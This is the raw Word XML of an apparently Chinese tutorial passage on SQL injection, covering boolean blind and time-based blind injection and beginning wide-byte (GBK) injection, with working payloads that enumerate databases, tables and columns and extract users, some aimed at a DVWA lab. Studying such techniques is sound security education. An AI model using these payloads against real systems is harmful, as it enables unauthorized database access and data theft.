    <w:p w14:paraId="2003CF8D" w14:textId="19BA815E" w:rsidR="0084547D" w:rsidRDefault="001302AE" w:rsidP="001302AE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同时利用了报错注入；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2301BED4" w14:textId="03D4A11F" w:rsidR="001302AE" w:rsidRDefault="00791B55" w:rsidP="001302AE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如果没有报错回显，可以使用延时注入；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35D24B" w14:textId="74F2BD3A" w:rsidR="00791B55" w:rsidRDefault="00791B55" w:rsidP="00791B55">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00791B55">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>8.</w:t>
      </w:r>
      <w:r w:rsidR="002F0219">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5247FE" w14:textId="43A4A6B6" w:rsidR="00883FF4" w:rsidRDefault="00883FF4" w:rsidP="00883FF4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布尔盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C36B529" w14:textId="3B06A23E" w:rsidR="00883FF4" w:rsidRDefault="00883FF4" w:rsidP="00883FF4">
      <w:r w:rsidRPr="00883FF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布尔盲注一般适用于页面没有回显字段</w:t>
      </w:r>
      <w:r w:rsidRPr="00883FF4">
        <w:t>(不支持联合查询)，且web页面返回True 或者 false，构造SQL语句，利用and，or等关键字来其后的语句 true 、 false使web页面返回true或者false，从而达到注入的目的来获取信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088AFE97" w14:textId="2130B03A" w:rsidR="00883FF4" w:rsidRDefault="00883FF4" w:rsidP="00883FF4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相关函数：</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0219">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>length()、substr()、ascii()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00883FF4">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>left()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7EE64F" w14:textId="0F298A39" w:rsidR="00883FF4" w:rsidRDefault="00F0343C" w:rsidP="00883FF4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A875E9" w14:textId="4D4E61C4" w:rsidR="00F0343C" w:rsidRDefault="00F0343C" w:rsidP="00883FF4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求当前数据库名长度</w:t>
      </w:r>
      <w:r w:rsidR="00BD5B8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B46B2D" w14:textId="30B5DC00" w:rsidR="00F0343C" w:rsidRPr="00F0343C" w:rsidRDefault="00F0343C" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0343C">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>SELECT * from users WHERE id = 1 and (length(database())=8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453EF999" w14:textId="62A64587" w:rsidR="00F0343C" w:rsidRDefault="00F0343C" w:rsidP="00883FF4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二分法求长度</w:t>
      </w:r>
      <w:r w:rsidR="00BD5B8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C026E" w14:textId="31E4DBA8" w:rsidR="00F0343C" w:rsidRDefault="00F0343C" w:rsidP="00883FF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求数据库名</w:t>
      </w:r>
      <w:r w:rsidR="00BD5B8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B9CEBE" w14:textId="0051D33D" w:rsidR="00F0343C" w:rsidRDefault="00F0343C" w:rsidP="00883FF4">
      <w:r w:rsidRPr="00F0343C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截取字符判断字符的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F0343C">
        <w:t>ascii码，从而确定字符</w:t>
      </w:r>
      <w:r w:rsidR="00BD5B8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，同样可以采用二分法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3CF243" w14:textId="498D7074" w:rsidR="00F0343C" w:rsidRPr="00F0343C" w:rsidRDefault="00F0343C" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F0343C">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>SELECT * from users WHERE id = 1 AND (ASCII(SUBSTR(database(),1,1)) = 115)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B1538D" w14:textId="0D3BCA86" w:rsidR="00F0343C" w:rsidRDefault="00BD5B8A" w:rsidP="00883FF4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5B8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>求当前数据库存在的表的数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B81A306" w14:textId="77777777" w:rsidR="00BD5B8A" w:rsidRPr="00BD5B8A" w:rsidRDefault="00BD5B8A" w:rsidP="00BD5B8A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5B8A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * from users WHERE id = 1 AND </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D53099" w14:textId="5757E363" w:rsidR="00BD5B8A" w:rsidRPr="00BD5B8A" w:rsidRDefault="00BD5B8A" w:rsidP="00BD5B8A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5B8A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>(select count(table_name) from information_schema.`TABLES` where table_schema = database()) = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73716B7A" w14:textId="4BF96C65" w:rsidR="00BD5B8A" w:rsidRDefault="00BD5B8A" w:rsidP="00883FF4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以下步骤相似，参考代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86E00D" w14:textId="77777777" w:rsidR="00BD5B8A" w:rsidRPr="00BD5B8A" w:rsidRDefault="00BD5B8A" w:rsidP="00BD5B8A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5B8A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * from users WHERE id = 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDDBA8C" w14:textId="79A71D05" w:rsidR="00BD5B8A" w:rsidRPr="00BD5B8A" w:rsidRDefault="00BD5B8A" w:rsidP="00BD5B8A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD5B8A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>AND (LENGTH((select table_name from information_schema.`TABLES` where table_schema = database() LIMIT 0,1))) = 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA63277" w14:textId="3B00A354" w:rsidR="00BD5B8A" w:rsidRDefault="00DA40A3" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA40A3">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>1' and (select count(table_name) from information_schema.tables where table_schema=database())=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286A269" w14:textId="3B56AA75" w:rsidR="00DA40A3" w:rsidRDefault="00DA40A3" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA40A3">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D62133" w14:textId="59C7A60E" w:rsidR="00DA40A3" w:rsidRPr="00346C71" w:rsidRDefault="00DA40A3" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA40A3">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF35A23" w14:textId="46ADE321" w:rsidR="00BD5B8A" w:rsidRPr="00346C71" w:rsidRDefault="00DA40A3" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA40A3">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A432A" w14:textId="60559F85" w:rsidR="00BD5B8A" w:rsidRPr="00346C71" w:rsidRDefault="000F27EF" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F27EF">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>1' and (select count(column_name) from information_schema.columns where table_name='users')=8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4EFA3" w14:textId="04920880" w:rsidR="00BD5B8A" w:rsidRPr="00346C71" w:rsidRDefault="00DE74BC" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE74BC">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2873727C" w14:textId="6D9375F4" w:rsidR="00BD5B8A" w:rsidRPr="00346C71" w:rsidRDefault="00DE74BC" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE74BC">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>1' and ascii(substr((select user from dvwa.users limit 0,1),1,1))=97</w:t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  <w:t>(?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655D5AAC" w14:textId="51FF40A8" w:rsidR="001B2A1D" w:rsidRDefault="001B2A1D" w:rsidP="001B2A1D">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2A1D">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>SELECT * from users WHERE id = 1 AND ASCII(SUBSTR((select column_name from information_schema.columns where table_name = "users" limit 0,1),1,1)) = 105</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（求列名）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A537731" w14:textId="36748A3C" w:rsidR="00BD5B8A" w:rsidRPr="001B2A1D" w:rsidRDefault="00DE74BC" w:rsidP="00883FF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE74BC">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>1' and (select count(*) from users where user = 'admin') = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AFD204" w14:textId="3A15E4AE" w:rsidR="00883FF4" w:rsidRPr="00883FF4" w:rsidRDefault="00883FF4" w:rsidP="00883FF4">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00883FF4">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00791B55">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>延时注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C1B2F" w14:textId="40777073" w:rsidR="001302AE" w:rsidRDefault="002F0219" w:rsidP="001302AE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相关函数：</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0219">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>length()、substr()、ascii()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0219">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>if()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0219">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sleep()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4121C35E" w14:textId="53A68706" w:rsidR="002F0219" w:rsidRDefault="002F0219" w:rsidP="001302AE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在没有任何回显时，使用该方法来对执行结果是否成功进行判断；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696C6D3" w14:textId="1014F1E0" w:rsidR="002F0219" w:rsidRDefault="002F0219" w:rsidP="001302AE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例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FE316" w14:textId="2DD24B46" w:rsidR="002F0219" w:rsidRDefault="002F0219" w:rsidP="001302AE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假设注入点为id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，首先判断数据库名长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2798BFA3" w14:textId="0498CF4C" w:rsidR="00791B55" w:rsidRPr="002F0219" w:rsidRDefault="002F0219" w:rsidP="002F0219">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:i w:val="0"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0219">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:i w:val="0"/>
          <w:iCs/>
        </w:rPr>
        <w:t>id=1 and if((length(database())=</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0219">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0219">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:i w:val="0"/>
          <w:iCs/>
        </w:rPr>
        <w:t>),sleep(5),1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C38A8" w14:textId="67F09D2B" w:rsidR="00791B55" w:rsidRDefault="002F0219" w:rsidP="001302AE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尝试黄色处数字，使用二分法</w:t>
      </w:r>
      <w:r w:rsidR="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，长度正确时，服务器会延时5秒返回数据；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CA5D88" w14:textId="36D17198" w:rsidR="00985C18" w:rsidRDefault="00985C18" w:rsidP="001302AE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lastRenderedPageBreak/>
        <w:t>然后猜解数据库名称，</w:t>
      </w:r>
      <w:r w:rsidRPr="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>substr()函数对数据库名的字符一个个截取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，再</w:t>
      </w:r>
      <w:r w:rsidRPr="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ascii()函数判断字符的ascii码值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，同样可以使用二分法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFFB75A" w14:textId="5395D707" w:rsidR="00985C18" w:rsidRPr="00985C18" w:rsidRDefault="00985C18" w:rsidP="001302AE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select user from test where id=1 and if((ascii(substr(database(),</w:t>
      </w:r>
      <w:r w:rsidRPr="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>,1))</w:t>
      </w:r>
      <w:r w:rsidRPr="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=116</w:t>
      </w:r>
      <w:r w:rsidRPr="00985C18">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>),sleep(5),1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA77382" w14:textId="0E2E2818" w:rsidR="001302AE" w:rsidRDefault="00985C18" w:rsidP="001302AE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对黄色部分进行</w:t>
      </w:r>
      <w:r w:rsidR="00761471">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>爆破；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094D9595" w14:textId="0E50E40C" w:rsidR="007702C5" w:rsidRDefault="001B2A1D" w:rsidP="00571E46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一下步骤与布尔盲注相似</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C74001" w14:textId="4397087C" w:rsidR="007702C5" w:rsidRDefault="00047ABA" w:rsidP="00571E46">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>上述部分采用手注的话，</w:t>
      </w:r>
      <w:r w:rsidR="001B2A1D">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>将是一个极其繁杂的过程</w:t>
      </w:r>
      <w:r w:rsidR="000E3E04">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142D5D42" w14:textId="1A4FE984" w:rsidR="000E3E04" w:rsidRDefault="00AC0353" w:rsidP="00296849">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296849">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidR="00296849" w:rsidRPr="00296849">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>宽字节注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE1ABD" w14:textId="122242D1" w:rsidR="00296849" w:rsidRDefault="00296849" w:rsidP="00296849">
      <w:r w:rsidRPr="00296849">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽字节注入是利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00296849">
        <w:t>msql的一个特性，mysql在使用GBK编码的时候，会认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两</w:t>
      </w:r>
      <w:r w:rsidRPr="00296849">
        <w:t>个字符是一个汉字GBK编码，它的编码范围是0×8140~0xFEFE(不包括xx7F)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A0805" w14:textId="27DED54E" w:rsidR="00296849" w:rsidRDefault="00296849" w:rsidP="00296849">
      <w:r w:rsidRPr="00296849">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00296849">
        <w:t>gbk汉字占两个字节，取值范围是（编码位数）：第一个字节是（129-254），第二个字节（64-254）当设置gbk编码后，遇到连续两个字节，都符合gbk取值范围，会自动解析为一个汉字。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763ED8B8" w14:textId="77777777" w:rsidR="00EE1D42" w:rsidRDefault="00296849" w:rsidP="00EE1D42">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库有时会使用</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D42" w:rsidRPr="00EE1D42">
        <w:t>addslashes函数</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D42" w:rsidRPr="00EE1D42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>滤</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D42" w:rsidRPr="00EE1D42">
        <w:t>GET、POST、COOKIE、REQUSET 提交的参数</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，提交的</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D42" w:rsidRPr="00EE1D42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>预定义字符会</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D42" w:rsidRPr="00EE1D42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转义成添加反斜杠的字符串</w:t>
      </w:r>
      <w:r w:rsidR="00EE1D42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA9E243" w14:textId="1B5144FC" w:rsidR="00296849" w:rsidRDefault="00EE1D42" w:rsidP="00EE1D42">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>'）= （\'）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>"） = （\"）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>\） = （\\）</w:t>
      </w:r>
    </w:p>
